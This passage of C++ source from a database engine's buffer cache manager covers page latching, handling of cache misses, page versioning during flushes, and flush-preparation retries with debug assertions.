errSXWL = CSXWLatch::ERR::errLatchConflict;
break;
}
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// if this was a latch conflict, bail
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
return ErrERRCheck( errBFLatchConflict );
}
// wait for ownership of the latch if required
else if ( errSXWL == CSXWLatch::ERR::errWaitForSharedLatch )
{
if ( pgnopbf.pbf->err == errBFIPageFaultPending )
{
BFIAsyncReadWait( pgnopbf.pbf, bfltShared, bfpri, tc );
}
else
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pgnopbf.pbf->sxwl.WaitForSharedLatch();
}
}
else if ( errSXWL == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
if ( pgnopbf.pbf->err == errBFIPageFaultPending )
{
BFIAsyncReadWait( pgnopbf.pbf, bfltExclusive, bfpri, tc );
}
else
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pgnopbf.pbf->sxwl.WaitForExclusiveLatch();
}
}
else
{
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
}
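// for a blocking write-latch request we only acquired the exclusive latch above, so finish
// by upgrading to the write latch here (waiting if necessary), including any per-proc hashed latches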
if ( bfltReq == bfltWrite && !( bflfT & bflfNoWait ) )
{
if ( pgnopbf.pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pgnopbf.pbf->sxwl.WaitForWriteLatch();
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( pgnopbf.pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pgnopbf.pbf->iHashedLatch ].sxwl;
if ( psxwlProc->ErrAcquireExclusiveLatch() == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForExclusiveLatch();
}
if ( psxwlProc->ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForWriteLatch();
}
}
}
#endif // MINIMAL_FUNCTIONALITY
}
Assert( FBFIOwnsLatchType( pgnopbf.pbf, bfltReq ) );
bfltHave = bfltReq;
OnDebug( relatchinfo[cRelatches].tickLatch = TickOSTimeCurrent() );
Assert( pgnopbf.pbf->ifmp == ifmp );
Assert( pgnopbf.pbf->pgno == pgno );
Assert( !pgnopbf.pbf->fAvailable );
Assert( !pgnopbf.pbf->fQuiesced );
if ( bfltReq == bfltWrite )
{
#ifdef DEBUG
Assert( pgnopbf.pbf->pgno <= g_rgfmp[ifmp].PgnoLast() || g_rgfmp[ifmp].FOlderDemandExtendDb() || ( bflfT & bflfLatchAbandoned ) );
#else
AssertTrack( pgnopbf.pbf->pgno <= g_rgfmp[ifmp].PgnoLast() || ( bflfT & bflfLatchAbandoned ), "WriteLatchPgnoLastTooLow" );
#endif
g_rgfmp[ifmp].UpdatePgnoHighestWriteLatched( pgno );
if ( !( bflf & bflfDBScan ) )
{
g_rgfmp[ifmp].UpdatePgnoWriteLatchedNonScanMax( pgno );
}
}
if ( bflf & bflfDBScan )
{
g_rgfmp[ifmp].UpdatePgnoLatchedScanMax( pgno );
}
// Ensure the pbf we pulled out of the g_bfhash is the right one
if ( !FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) )
{
// Abort the latch on the wrong pbf, and retry ...
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
continue;
}
// Under latchless IO we can have a page that is non-updatable / i.e. undergoing a flush, and
// this is ok for like a simple read / s-latch case ... However, this is not allowed:
// 1. if this thread is going for an x-latch (because WAR-latch or RDW->Write upgrades),
// 2. or if this thread is going for a w-latch (obviously),
// 3. or a page is not resident and thus we'd try to do a OS MM reclaim or BFISyncRead on it.
// In these 3 cases we have to do a COW / VersionCopyPage() to unburden the buffer
// undergoing the Write IO.
//
if ( ( bfltExclusive == bfltReq || bfltWrite == bfltReq ) &&
!FBFIUpdatablePage( pgnopbf.pbf ) )
{
PBF pbfNew = NULL;
AssertRTL( pgnopbf.pbf->err > -65536 && pgnopbf.pbf->err < 65536 );
if ( pgnopbf.pbf->err == wrnBFPageFlushPending &&
FBFICompleteFlushPage( pgnopbf.pbf, bfltReq ) )
{
// completed the state transition associated with the write IO ...
Enforce( pgnopbf.pbf->err < JET_errSuccess || pgnopbf.pbf->bfdf == bfdfClean );
Enforce( FBFIUpdatablePage( pgnopbf.pbf ) );
Assert( pgnopbf.pbf->err != errBFIPageRemapNotReVerified );
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... conveniently read IO error processing is below, so
// just let it flow through ...
}
else
{
// we are going to claim this as a latch conflict for now ...
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
const ERR errVersion = ErrBFIVersionCopyPage( pgnopbf.pbf, &pbfNew, fTrue, ( bfltWrite == bfltReq ) );
AssertRTL( errVersion > -65536 && errVersion < 65536 );
if ( errVersion >= JET_errSuccess )
{
CallS( errVersion );
// We've a newer (pbfNew) version of the page, and pgnopbf.pbf is now old
Assert( pbfNew );
if ( pgnopbf.pbf->bfdf > bfdfClean )
{
Assert( pgnopbf.pbf->pbfTimeDepChainPrev == pbfNew );
Assert( pbfNew->pbfTimeDepChainNext == pgnopbf.pbf );
}
Assert( !pgnopbf.pbf->fCurrentVersion );
Assert( pgnopbf.pbf->fOlderVersion );
Assert( !pbfNew->fOlderVersion );
Assert( pbfNew->fCurrentVersion );
// we should have the real buffer write latched at this point ...
Assert( FBFWriteLatched( ifmp, pgno ) );
// alright release this page / buffer ...
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
// we should still have the real buffer write latched at this point ...
Assert( FBFWriteLatched( ifmp, pgno ) );
// release the new version as well
pbfNew->sxwl.ReleaseWriteLatch();
// whoops, just jump back to the top and play it again ...
// it will fix itself up, how convenient.
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
continue;
}
else
{
Assert( JET_errOutOfMemory == errVersion );
Assert( NULL == pbfNew );
// dump and bail ...
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
return errVersion;
}
}
}
// even if the cache is stable, we need to update the residency map.
BFIMaintCacheResidencyRequest();
// update DBA statistics and redirect not resident page faults to
// the database whenever possible
(void)ErrBFIMaintCacheStatsRequest( bfmcsrtNormal );
const OSFILEQOS qosIoPriorities = QosBFIMergeInstUserDispPri( PinstFromIfmp( pgnopbf.pbf->ifmp ), QosBFUserAndIoPri( bfpri ) );
if ( bfrsResident != pgnopbf.pbf->bfrs &&
pgnopbf.pbf->bfat == bfatFracCommit )
{
TraceContextScope tcBFLatch( iorpBFLatch );
BFIReclaimPageFromOS( pgnopbf.pbf, bfltReq, ( bflfT & bflfNew ), !( bflfT & bflfNoWait ), qosIoPriorities, cpe, *tcBFLatch );
}
// check to make sure the view doesn't need to be freshened to avoid
// deref'ing a paged out view.
if ( pgnopbf.pbf->bfat == bfatViewMapped && !FBFICacheViewFresh( pgnopbf.pbf ) )
{
TraceContextScope tcBFLatch( iorpBFLatch );
err = ErrBFICacheViewFreshen( pgnopbf.pbf, qosIoPriorities, *tcBFLatch );
if ( err < JET_errSuccess )
{
// release our latch and return the error
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
// We could opportunistically take the write latch and update pbf->err, but
// I am going to leave the error path simple for now.
return err;
}
}
// check if this page is abandoned and retry; the expectation is that the purge code
// will eventually purge the page because buffers aren't supposed to remain in the cache
// in this state for an arbitrary amount of time.
if ( pgnopbf.pbf->fAbandoned && !( bflfT & bflfLatchAbandoned ) )
{
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
pgnopbf.pbf = NULL;
pgnopbf.pgno = pgnoNull;
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
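// back off quadratically between retries so a persistently abandoned page doesn't make us spin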
UtilSleep( ( cRelatches * cRelatches / 2 ) * dtickFastRetry );
continue;
}
Assert( !( bflfT & ( bflfNew | bflfNewIfUncached ) ) || ( bfltReq == bfltWrite ) );
// we are latching a new page
if ( bflfT & bflfNew )
{
Assert( pgnopbf.pbf->ifmp == ifmp );
BFIInitialize( pgnopbf.pbf, tc );
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fTrue;
}
// the page is valid
err = JET_errSuccess;
}
// we are not latching a new page
else
{
// if this page was preread and we are touching it for the first
// time after the preread, do not touch it again even if asked
if ( pgnopbf.pbf->err == errBFIPageNotVerified )
{
bflfT = BFLatchFlags( bflfT | bflfNoTouch );
}
// check the IO error and validate the page
TraceContextScope tcBFLatch( iorpBFLatch );
err = ErrBFIValidatePage( pgnopbf.pbf, bfltReq, cpe, *tcBFLatch );
AssertRTL( err > -65536 && err < 65536 );
Assert( err != JET_errOutOfMemory &&
err != JET_errOutOfBuffers );
// we should not see any pages beyond EOF lingering in the cache because
// we both block preread beyond EOF and reject a synchronous read of such
// a page
AssertTrack( err != JET_errFileIOBeyondEOF, "BFILatchEofCachedValidate" );
// The page is in an error state and we should fail on an error.
// Note that JET_errFileIOBeyondEOF is rejected by the buffer manager
// and will cause the latch to fail, so bflfNoFaultFail is not honored
// in that case.
if ( ( ( err < JET_errSuccess ) && !( bflfT & bflfNoFaultFail ) ) ||
( err == JET_errFileIOBeyondEOF ) /* just in case */ )
{
// release our latch and return the error
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
return err;
}
// if user requested "bad" pages, fix the error
Assert( err >= JET_errSuccess || ( bflfT & bflfNoFaultFail ) );
if ( err < JET_errSuccess )
{
if ( bflfT & bflfNoFaultFail )
{
// might be interesting to return a warning, but don't want to conflict
// with wrnBFPageFault for now, wait until we need it ...
err = JET_errSuccess;
}
}
}
// in view cache mode a page can be pre-fetched, and then paged back out by
// the OS MM ... if it's an x- or w- latch we will soon be updating it, so we
// want it paged back in and to materialize any IO error in an explicit path,
// rather than AV randomly in the engine.
if ( FBFICacheViewCacheDerefIo( pgnopbf.pbf ) &&
( bfltReq == bfltExclusive || bfltReq == bfltWrite ) &&
pgnopbf.pbf->bfdf == bfdfClean )
{
err = ErrBFIFaultInBufferIO( pgnopbf.pbf );
AssertTrack( err != JET_errFileIOBeyondEOF, "BFILatchEofCachedMM" );
// the page is in an error state and we should fail on an error
if ( ( ( err < JET_errSuccess ) && !( bflfT & bflfNoFaultFail ) ) ||
( err == JET_errFileIOBeyondEOF ) /* just in case */ )
{
// release our latch and return the error
BFIReleaseSXWL( pgnopbf.pbf, bfltReq );
bfltHave = bfltNone;
return err;
}
// if user requested "bad" pages, fix the error
Assert( err >= JET_errSuccess || ( bflfT & bflfNoFaultFail ) );
if ( err < JET_errSuccess )
{
if ( bflfT & bflfNoFaultFail )
{
// might be interesting to return a warning, but don't want to conflict
// with wrnBFPageFault for now, wait until we need it ...
err = JET_errSuccess;
}
}
}
// the user requested that we touch this page
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
const BOOL fTouchPage = ( !( bflfT & bflfNoTouch ) && !BoolParam( JET_paramEnableFileCache ) );
#ifndef MINIMAL_FUNCTIONALITY
if ( fTouchPage &&
g_fBFMaintHashedLatches &&
// Since we overload tickEligibleForNomination with tickViewLastRefreshed for
// view cache we must prevent view cache pages from being considered for fast
// latches. A reasonable trade-off.
pgnopbf.pbf->bfat == bfatFracCommit &&
g_bflruk.FSuperHotResource( pgnopbf.pbf ) )
{
BFILatchNominate( pgnopbf.pbf );
}
#endif // !MINIMAL_FUNCTIONALITY
BFITouchResource( pgnopbf.pbf, bfltReq, bflfT, fTouchPage, PctBFCachePri( bfpri ), tc );
// return the page
break;
}
// we did not find the IFMP / PGNO or we are not latching uncached pages
// and the found BF is currently undergoing I/O
else
{
Assert( bfltHave == bfltNone );
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// if we are not latching uncached pages, bail
if ( bflfT & bflfNoUncached )
{
return ErrERRCheck( errBFPageNotCached );
}
// this is now officially a cache miss
fCacheMiss = fTrue;
const BOOL fNewPage = ( bflfT & bflfNew ) || ( bflfT & bflfNewIfUncached );
// try to add this page to the cache
pgnopbf.pbf = NULL;
err = ErrBFICachePage( &pgnopbf.pbf,
ifmp,
pgno,
fNewPage, // fNewPage
fTrue, // fWait
fNewPage, // fMRU
PctBFCachePri( bfpri ), // pctCachePriority
tc, // tc
bfltReq, // bfltTraceOnly
bflfT ); // bflfTraceOnly
AssertRTL( err > -65536 && err < 65536 );
AssertTrack( ( err != JET_errFileIOBeyondEOF ) || !fNewPage, "BFILatchEofUncached" );
// the page was added to the cache
if ( err == JET_errSuccess )
{
bfltHave = bfltWrite;
TraceContextScope tcBFLatch( iorpBFLatch );
Assert( pgnopbf.pbf->sxwl.FOwnWriteLatch() );
Assert( pgnopbf.pbf->icbPage == pgnopbf.pbf->icbBuffer );
// we are latching a new page
if ( fNewPage )
{
// if the page was previously abandoned, it is no longer such ...
pgnopbf.pbf->fAbandoned = fFalse;
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fTrue;
}
}
// we are not latching a new page
if ( !fNewPage )
{
// read the page image from disk
pgnopbf.pbf->fSyncRead = fTrue; // note: not doing this in BFISyncRead() may cause a bug some day, but we don't want to mark pages as re-read due to OS page-out
BFISyncRead( pgnopbf.pbf, QosBFIMergeInstUserDispPri( PinstFromIfmp( ifmp ), QosBFUserAndIoPri( bfpri ) ), *tcBFLatch );
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "Sync-read page=[0x%x:0x%x]", (ULONG)ifmp, pgno ) );
// check the IO error and validate the page
err = ErrBFIValidatePage( pgnopbf.pbf, bfltWrite, cpe, *tcBFLatch );
AssertRTL( err > -65536 && err < 65536 );
AssertTrack( err != JET_errFileIOBeyondEOF, "BFILatchEofUncachedValidate" );
Expected( err != JET_errOutOfMemory &&
err != JET_errOutOfBuffers );
// the page is in an error state and we should fail on an error
if ( ( ( err < JET_errSuccess ) && !( bflfT & bflfNoFaultFail ) ) ||
( err == JET_errFileIOBeyondEOF ) /* just in case */ )
{
// release our latch and return the error
pgnopbf.pbf->sxwl.ReleaseWriteLatch();
bfltHave = bfltNone;
return err;
}
// if user requested "bad" pages, fix the error
Assert( err >= JET_errSuccess || ( bflfT & bflfNoFaultFail ) );
if ( err < JET_errSuccess )
{
if ( bflfT & bflfNoFaultFail )
{
// might be interesting to return a warning, but don't want to conflict
// with wrnBFPageFault for now, wait until we need it ...
err = JET_errSuccess;
}
}
}
// trace the page identity
if ( fNewPage )
{
// Unfortunately, we don't have the objid and page flags here and so the former
// trace (etguidCacheBlockNewPage) that was here has been moved / deferred to
// post page init in CPAGE::FinalizePreInitPage(). Also note this changes the
// trace conditions subtly as it now traces a new page request even if the page
// was already in the cache (which is desirable for tracing page [not cache]
// lifecycles). If you're worried about ordering and the basic BF traces,
// remember there is a trace for ErrBFICachePage above to call BFITraceCachePage
// with etguidCacheBlockCachePage with the bflf (i.e. with bflfNew), so this
// trace here was superfluous and had bad page details.
}
else
{
if ( FBFIDatabasePage( pgnopbf.pbf ) )
{
// trace the operation
GetCurrUserTraceContext getutc;
CPAGE::PGHDR * ppghdr = (CPAGE::PGHDR *)pgnopbf.pbf->pv;
ETCacheReadPage(
ifmp,
pgno,
bflf,
ppghdr->objidFDP,
ppghdr->fFlags,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tcBFLatch->iorReason.Iorp(),
tcBFLatch->iorReason.Iors(),
tcBFLatch->iorReason.Iort(),
tcBFLatch->iorReason.Ioru(),
tcBFLatch->iorReason.Iorf(),
tcBFLatch->nParentObjectClass,
ppghdr->dbtimeDirtied,
ppghdr->itagMicFree,
ppghdr->cbFree );
}
}
// make this BF eligible for nomination
Assert( pgnopbf.pbf->bfls != bflsHashed );
// Technically, these are setting the same variable here, but in case one feature is
// removed, the other will stay.
pgnopbf.pbf->tickViewLastRefreshed = TickBFIHashedLatchTime( TickOSTimeCurrent() );
pgnopbf.pbf->tickEligibleForNomination = pgnopbf.pbf->tickViewLastRefreshed;
// return the page
Assert( bfltHave == bfltWrite );
break;
}
// the page was already in the cache
else if ( err == errBFPageCached )
{
// try to latch the page again
OnDebug( relatchinfo[cRelatches].ulLineContinue = __LINE__ );
cRelatches++;
continue;
}
// the page could not be added to the cache
else
{
Assert( err == JET_errOutOfMemory ||
err == JET_errOutOfBuffers ||
err == JET_errFileIOBeyondEOF );
// fail out
AssertRTL( err > -65536 && err < 65536 );
return err;
}
}
} // forever loop
// downgrade our write latch to the requested latch.
if ( ( bfltHave != bfltReq ) && ( bfltHave != bfltNone ) )
{
EnforceSz( bfltHave == bfltWrite, OSFormat( "BadLatchDowngrade:%d", (int)bfltHave ) );
Expected( fCacheMiss ); // Currently only needed for cache miss where we w-latch to perform read IO.
switch ( bfltReq )
{
case bfltShared:
pgnopbf.pbf->sxwl.DowngradeWriteLatchToSharedLatch();
bfltHave = bfltShared;
break;
case bfltExclusive:
pgnopbf.pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
bfltHave = bfltExclusive;
break;
case bfltWrite:
break;
default:
Assert( fFalse );
break;
}
}
// if the tce is not set then do so now
if ( (TCE)tc.nParentObjectClass != tceNone && pgnopbf.pbf->tce == tceNone )
{
PERFOpt( cBFCache.Dec( PinstFromIfmp( ifmp ), pgnopbf.pbf->tce, ifmp ) );
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), (TCE)tc.nParentObjectClass, ifmp ) );
pgnopbf.pbf->tce = (TCE)tc.nParentObjectClass;
}
// return the page
AssertRTL( err > -65536 && err < 65536 );
if ( fCacheMiss )
{
PERFOpt( cBFCacheMiss.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce ) );
}
PERFOpt( cBFSlowLatch.Inc( perfinstGlobal ) );
if ( bflf & bflfHint )
{
PERFOpt( cBFBadLatchHint.Inc( perfinstGlobal ) );
err = err < JET_errSuccess ? err : ErrERRCheck( wrnBFBadLatchHint );
}
PERFOpt( cBFCacheReq.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce ) );
pbfl->pv = pgnopbf.pbf->pv;
pbfl->dwContext = DWORD_PTR( pgnopbf.pbf );
// this should now always be true, even with bflfNoFaultFail
Assert( ( err < JET_errSuccess &&
pgnopbf.pbf->sxwl.FNotOwner() &&
bfltHave == bfltNone ) ||
( err >= JET_errSuccess &&
FBFIOwnsLatchType( pgnopbf.pbf, bfltReq ) &&
bfltHave == bfltReq ) );
#ifdef DEBUG
if ( bflf & bflfNoFaultFail )
{
// just a handful of errors we know we should have handled ...
if ( pgnopbf.pbf->err == JET_errDiskIO ||
pgnopbf.pbf->err == JET_errReadVerifyFailure )
{
// we return success, even though we have error state under bflfNoFaultFail
Assert( err != pgnopbf.pbf->err );
}
}
#endif
AssertRTL( err > -65536 && err < 65536 );
return ( err != JET_errSuccess ?
err :
( fCacheMiss ?
ErrERRCheck( wrnBFPageFault ) :
JET_errSuccess ) );
}
//#define NUKE_OLD_VERSIONS_EXPENSIVE_DEBUG
#ifdef NUKE_OLD_VERSIONS_EXPENSIVE_DEBUG
DWORD g_cbfFlushPurgeNukeAttempts = 0;
DWORD g_cbfFlushPurgeNukeSuccesses = 0;
BOOL FBFIFlushPurgeNukeRelease( PBF pbf, IOREASONPRIMARY iorp )
{
BOOL fRet = fFalse;
Assert( pbf->sxwl.FOwnWriteLatch() );
g_cbfFlushPurgeNukeAttempts++;
// Lets assert we are at least meeting with a little success ...
Assert( ( g_cbfFlushPurgeNukeAttempts / 16 ) <= g_cbfFlushPurgeNukeSuccesses );
//
// If the page is not clean yet, we will need to flush first ...
//
if ( pbf->bfdf != bfdfClean )
{
// First need to ensure page can be flushed, flush any dependencies ...
if ( ErrBFITryPrepareFlushPage( pbf, bfltWrite, IOR( iorp ), qosIODispatchUrgentBackgroundMax, fTrue ) < JET_errSuccess )
{
// We have failed.
return fFalse;
}
// Next actually write/flush the page itself.
//
TraceContext tcContext = BFIGetTraceContext( pbf );
tcContext.iorReason.SetIorp( iorp );
tcContext.iorReason.AddFlag( iorfForeground );
if ( ErrBFISyncWrite( pbf, bfltWrite, qosIODispatchImmediate, &tcContext ) < JET_errSuccess )
{
// We have failed.
return fFalse;
}
}
//
// Now Purge / Evict the page ... note this also releases the latch.
//
// Lock LRU-K for eviction
//
BFLRUK::CLock lockLRUK;
g_bflruk.LockResourceForEvict( pbf, &lockLRUK );
// Release w-latch, so ErrBFIEvict can operate correctly
pbf->sxwl.ReleaseWriteLatch();
// Evict specific page/pbf.
//
ERR errEvict = ErrBFIEvictPage( pbf, &lockLRUK, BFEvictFlags( bfefReasonTest | bfefNukePageImage ) );
// Latch is gone whether successful or not ...
fRet = fTrue;
g_cbfFlushPurgeNukeSuccesses += ( JET_errSuccess == errEvict );
g_bflruk.UnlockResourceForEvict( &lockLRUK );
return fRet;
}
#endif
void BFIUnlatchMaintPage( __inout PBF const pbf, __in const BFLatchType bfltHave )
{
PBF pbfNew = NULL;
Assert( bfltMax != bfltHave );
Assert( pbf->sxwl.FOwner() );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
// There should be something interesting about this bf to maintain ...
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) );
// save anything we might need post unlatch
const BFDirtyFlags bfdf = BFDirtyFlags( pbf->bfdf );
// If we have a write latch, we can do more maintenance
if ( bfltWrite == bfltHave )
{
Assert( pbf->bfdf >= bfdfUntidy );
// if this BF is impeding the checkpoint and there are other threads
// waiting for the exclusive latch and the page doesn't already have an
// older version then try to version the page while we still have the
// exclusive latch to facilitate checkpoint advancement
// see if we want to opportunistically version this page to try to flush
BFIOpportunisticallyVersionCopyPage( pbf, &pbfNew, fTrue /* has write latch */ );
if ( pbfNew )
{
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
Assert( pbfNew->sxwl.FOwnWriteLatch() );
pbfNew->sxwl.ReleaseWriteLatch();
#ifdef NUKE_OLD_VERSIONS_EXPENSIVE_DEBUG
if ( bfltExclusive == bfltHave )
{
// Note this can cause a deadlock, but VERY, VERY rarely ... need try
// upgrade ... or remove before checkin, restrict to if we have the w-latch ...
CSXWLatch::ERR errEUWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
if ( errEUWL != CSXWLatch::errSuccess )
{
Assert( errEUWL == CSXWLatch::errWaitForWriteLatch );
pbf->sxwl.WaitForWriteLatch();
}
bfltHave = bfltWrite;
}
if ( FBFIFlushPurgeNukeRelease( pbf, iorpBFCheckpointAdv ) )
{
bfltHave = bfltMax; // released!
}
#endif
}
}
// Actually release the latch
if ( bfltMax != bfltHave )
{
BFIReleaseSXWL( pbf, bfltHave );
}
// Now do post processing ...
if ( bfdf == bfdfFilthy )
{
// try to flush this filthy IFMP / PGNO
BFIOpportunisticallyFlushPage( pbf, iorpBFFilthyFlush );
}
else if ( pbfNew )
{
// we felt a need to version the page for checkpoint, try to flush the page ...
BFIOpportunisticallyFlushPage( pbf, iorpBFCheckpointAdv );
}
// validate our situation
Assert( pbf->sxwl.FNotOwner() );
if ( pbfNew )
{
Assert( pbfNew->sxwl.FNotOwner() );
}
}
PBF PbfBFIGetFlushOrderLeaf( const PBF pbf, const BOOL fFlagCheckpointImpeders )
{
PBF pbfT = NULL;
// find a leaf of our branch in the time dependency chain
Assert( g_critBFDepend.FOwner() );
pbfT = pbf;
while ( pbfT->pbfTimeDepChainNext != pbfNil )
{
pbfT = pbfT->pbfTimeDepChainNext;
Assert( pbfT->ifmp == pbf->ifmp ); // no cross-database dependencies allowed
if ( fFlagCheckpointImpeders )
{
pbfT->bfbitfield.SetFImpedingCheckpoint( fTrue );
}
}
Assert( pbfT->pbfTimeDepChainNext == pbfNil );
// return the leaf of our branch ... note this could be the original pbf.
return pbfT;
}
void BFIAssertReadyForWrite( __in const PBF pbf )
{
// ensure the lockless-IO write status state is correct
Assert( FBFIUpdatablePage( pbf ) );
Assert( pbf->bfbitfield.FRangeLocked() );
Assert( pbf->err != errBFIPageFaultPending );
Assert( pbf->err != wrnBFPageFlushPending );
Assert( pbf->pWriteSignalComplete == NULL );
Assert( PvBFIAcquireIOContext( pbf ) == NULL );
// should be no error, or we couldn't write this
Assert( JET_errSuccess == pbf->err );
// ensure there are no dependencies on this BF
Assert( !pbf->bfbitfield.FDependentPurged() );
Assert( pbf->pbfTimeDepChainNext == pbfNil );
Assert( pbf->prceUndoInfoNext == prceNil );
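// the page's last logged modification, if any, must already be below the database's waypoint
// before the buffer may be written out (the write-ahead-logging requirement)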
Assert( ( CmpLgpos( &pbf->lgposModify, &lgposMin ) == 0 ) ||
( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) < 0 ) );
#ifdef DEBUG
const INST * const pinst = PinstFromIfmp( pbf->ifmp );
LOG * const plog = pinst->m_plog;
// In recovery, we set the lgposFlushTip to like 0x3:FFFF:FFFF when the lgposWrite
// is at 0x3:0034:0032 (= whatever we just last replayed) ... consider nailing down
// this contract enough to improve the assert, but for now skip the recovering case.
// There are also cases when transitioning out of recovery-redo in which m_fRecovering
// and m_fRecoveringMode flip back and forth to avoid asserts in some log read APIs,
// causing confusion in LGWriteAndFlushTip(), which returns different variables depending
// on those flags. Therefore, only consume lgposWriteTip when we are fully initialized.
// Obviously, the checks don't make sense if logging is disabled either.
if ( !plog->FLogDisabled() )
{
const BOOL fJetInitialized = pinst->m_fJetInitialized;
const BOOL fRecovering = plog->FRecovering();
LGPOS lgposFlushTip, lgposWriteTip;
plog->LGWriteAndFlushTip( &lgposWriteTip, &lgposFlushTip );
const INT icmpFlush = CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgposFlushTip );
const INT icmpWrite = CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgposWriteTip );
Assert( ( icmpWrite < 0 ) || !fJetInitialized );
Assert( icmpFlush < 0 );
Assert( ( CmpLgpos( &lgposFlushTip, &lgposWriteTip ) <= 0 ) || fRecovering || !fJetInitialized );
}
const BOOL fSnapshotFlushed = !g_rgfmp[ pbf->ifmp ].FRBSOn() || CmpRbspos( g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint(), pbf->rbsposSnapshot ) >= 0;
Assert( fSnapshotFlushed );
#endif
}
// same as prepare flush page, but repeatedly tries synchronously ... if it can't succeed within reasonable
// effort, it gives up and fails out ...
ERR ErrBFITryPrepareFlushPage(
_Inout_ const PBF pbf,
_In_ const BFLatchType bfltHave,
_In_ IOREASON ior,
_In_ const OSFILEQOS qos,
_In_ const BOOL fRemoveDependencies )
{
Assert( pbf->sxwl.FOwnWriteLatch() && bfltWrite == bfltHave ); // expected
ERR err = JET_errSuccess;
CBFIssueList bfil;
ULONG cIter = 0;
// try to prepare the page for flushing / possibly removing any dependencies ...
while( ( err = ErrBFIPrepareFlushPage( pbf, bfltHave, ior, qos, fRemoveDependencies ) ) < JET_errSuccess )
{
cIter++;
// must issue anything enqueued (older BFs / time dependencies, or log flushes)
CallS( bfil.ErrIssue( fTrue ) );
// this might go off ... it has been seen in practice, rarely, but not rarely enough to keep it enabled ...
//Assert( cIter < 10 );
if ( ( cIter >= 10 ) || ( err == errBFIPageAbandoned ) )
{
// We try this 10 times, and then give up.
// Also, fail fast if the BF is abandoned.
return err;
}
UtilSleep( dtickFastRetry );
}
CallS( bfil.ErrIssue( fTrue ) );
Expected( err >= JET_errSuccess );
return err;
}
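// Illustrative usage sketch (hypothetical caller, shown only to clarify the contract): a caller
// that already holds the write latch and has an IOREASON 'ior' and OSFILEQOS 'qos' in hand would
// do something like
//
//     if ( ErrBFITryPrepareFlushPage( pbf, bfltWrite, ior, qos, fTrue ) >= JET_errSuccess )
//     {
//         // the page is now prepared; it can be handed to the async write path
//     }
//
// The retry loop above gives up after 10 failed attempts of ErrBFIPrepareFlushPage() (or sooner if
// the BF is abandoned), sleeping dtickFastRetry and issuing any enqueued dependent work between retries.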
#ifdef DEBUG
VOID BFIAssertReqRangeConsistentWithLgpos( FMP* const pfmp, const LGPOS& lgposOB0, const LGPOS& lgposModify, const CHAR* const szTag )
{
const BOOL fIsOB0Set = CmpLgpos( lgposOB0, lgposMax ) != 0;
const BOOL fIsLgposModifySet = CmpLgpos( lgposModify, lgposMin ) != 0;
if ( !fIsOB0Set && !fIsLgposModifySet )
{
return;
}
LONG lGenMinRequired = 0, lGenMaxRequired = 0;
LONG lGenMinConsistent = 0;
LONG lGenPreRedoMinConsistent = 0, lGenPreRedoMinRequired = 0;
ULONG ulTrimCount = 0, ulShrinkCount = 0;
{
PdbfilehdrReadOnly pdbfilehdr = pfmp->Pdbfilehdr();
